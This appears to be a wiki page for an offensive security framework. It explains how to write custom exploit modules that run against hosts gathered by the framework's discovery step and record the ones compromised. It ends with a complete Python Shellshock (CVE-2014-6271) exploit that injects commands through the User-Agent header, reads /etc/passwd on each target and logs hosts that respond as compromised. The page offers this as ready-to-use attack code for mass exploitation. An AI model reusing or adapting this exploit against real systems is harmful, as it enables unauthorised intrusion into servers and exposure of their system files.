-
Notifications
You must be signed in to change notification settings - Fork 236
Writing Custom Exploits
In "Custom Exploit" module, you can exploit the targets which are discovered in Discovery module with your custom exploit. If you don't have any discovered targets, you can't exploit them. Please visit "Discovery" page for this.
Available exploits are located under /lib/exploits folder. If you want to implement your own exploit, you need to put it on that directory.
Exploits are written in Python version 2.7.
For parsing pre-discovered targets, you need to import discovery_parse function from lib/utils.py
from lib.utils import discovery_parse
discovery_parse function takes an discovery id(string) and returns elements on it (IP or URL) in list format.
For example censys_ssh_28381923.txt consists following targets in it:
192.168.1.5
192.168.1.89
Calling discovery_parse("28381923") will return:
['192.168.1.5','192.168.1.89']
You can run your exploit code against these targets in list in a loop.
For saving successfully exploited targets, you need to import compromise_save function from lib/utils.py
from lib.utils import compromise_save
compromise_save function takes 3 parameters: discovery_id, exploit_name, asset_list and creates a file under /assets/compromised which includes successfully exploited targets in following filename: "custom_exploitname_discoveryid.txt" For example: "custom_struts_2849312.txt"
discovery_id: You can use initial value which is given by user.
exploit_name: It's a generic name of the exploit. Use only alphanumeric characters. For example: "struts"
asset_list: You need to append successfully exploited targets to list. compromise_save will write them to the text file in a loop.
This function is needed for showing basic info about the exploit on the menu. Your function needs to return a info string. For example:
def show_desc():
return "Shellshock Remote Code Execution (CVE-2014-6271)"
This is the part where your code sends the payload to the target. It returns target's response
-action function needs to take an "discovery_id" which is 7 digit integer.
def action(discovery_id)
-You need to call discovery_parse function with discovery_id value in order to get target URLs or IP addresses.
urllist = discovery_parse(discovery_id)
-For every url in urllist, call exploit function
for url in urllist:
response = exploit(url, "cat /etc/passwd/")
-If exploit was successful, append the URL/IP to a list.
successful_urls.append(url)
-After all targets are done, save successful url's with compromise_save function
if successful_urls: #if not empty
compromise_save(discovery_id, exploit_name, successful_urls)
Following exploit is written for identifying Shellshock vulnerability.
from lib.utils import discovery_parse,compromise_save
import sys
import urllib2
exploit_name = "shellshock" #this goes to file name
#Tries to exploit given url with given command. Returns servers response.
def exploit(url, command):
response = ""
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; ' + command)]
try:
response = opener.open(url)
except:
pass
return response
#Most of things are done in this function. It parses targets with given discovery id
#checks if exploit is successful, appends successful ones to list and saves them with
#compromise_save function
def action(discovery_id):
successful_urls = []
urllist = discovery_parse(discovery_id)
print urllist
for url in urllist:
response = exploit(url, "cat /etc/passwd/")
try:
if "root" in response:
successful_urls.append(url)
print "Vulnerable! " + url
except:
pass
if successful_urls:
compromise_save(discovery_id, exploit_name, successful_urls)
def show_desc():
return "Shellshock Remote Code Execution (CVE-2014-6271)"